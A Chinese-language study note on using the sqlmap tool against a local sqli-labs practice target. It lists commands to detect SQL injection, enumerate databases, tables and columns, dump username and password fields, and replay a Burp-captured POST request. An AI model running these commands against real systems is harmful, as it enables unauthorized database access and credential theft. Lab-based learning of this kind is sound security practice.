网络安全学习笔记——SalMap爆破添加快捷方式

SqlMap的使用

SqlMap是SQLMap注入的神器，但是SqlMap只能跑一些过滤不太严格的注入，也可以使用Python编写的脚本跑
SqlMap使用

本机先装好Python环境，打开sqlmap下的cmd，在cmd的对话框输入python sqlmap.py 启动SqlMap，出现以下界面就说明sqlmap能正常使用，可以在网上找教程，把sqlmap做成一个链接放在桌面，方便后续直接使用在Windows桌面创建sqlmap快捷方式

注入成功，第一个是布尔盲注，第二个是错误注入，第三个是时间盲注，注入成功之后也会在本地形成一个文件缓存，即 C:\Users\Conpere\AppData\Local\sqlmap\output\192.168.165.98

语法应用

    sqlmap语法
    首先确定注入点——实战中的注入点就是用户和数据段进行交互的地方，根据参数判断

    -u 给sqlmap直接传入一个url是跑不出来注入的，因为它不知道此时的参数是什么，如
    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/
    要给它后面加参数，才能提供注入点，方便工具去查找注入，如
    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/?id=1
    传递的参数要是对方服务器里实际存在的，而且是可以注入的参数

SqlMap爆破

    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/?id=1 --加参数--users         爆出sql的所有用户--passwords     爆出数据库账户与密码  一般不会直接读出账号密码，不建议使用--dbs           可以爆出该MySQL中的所有数据库的名字--current-db    爆出当前使用的数据库--current-user  爆出当前数据库使用账户--tables        爆出所有的表1.-D [数据库名] --tables2.-D [数据库名] -T [表名] --columns3.-D [数据库名] -T [表名] -C"username,realname,password" --dumpMySql爆破第一步  寻找是否存在sql注入点python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1"第二步  查询当前sql库python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" --current-db第三步  脱指定库的所有表python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security --tables第四步  爆指定库，指定表的所有字段python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security -T users --columns第五步  爆指定库，指定表，指定字段的所有值python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security -T users -C "username,password" --dump--dump 爆出列表中指定列的内容SqlMap的万能用法——可用于跑post数据包（Burp和SqlMap的联动）1.拿Burp抓取post传输的，要测试sql注入的网页的包，在抓包界面右键，save item 保存文件2.打开SqlMap python sqlmap.py -r +文件的存储地址此时可以判断出来该网站是否存在sql注入点，如果有的话，还会显示相应的方式，如盲注，联合注入等再重复上述第二步~第五步即可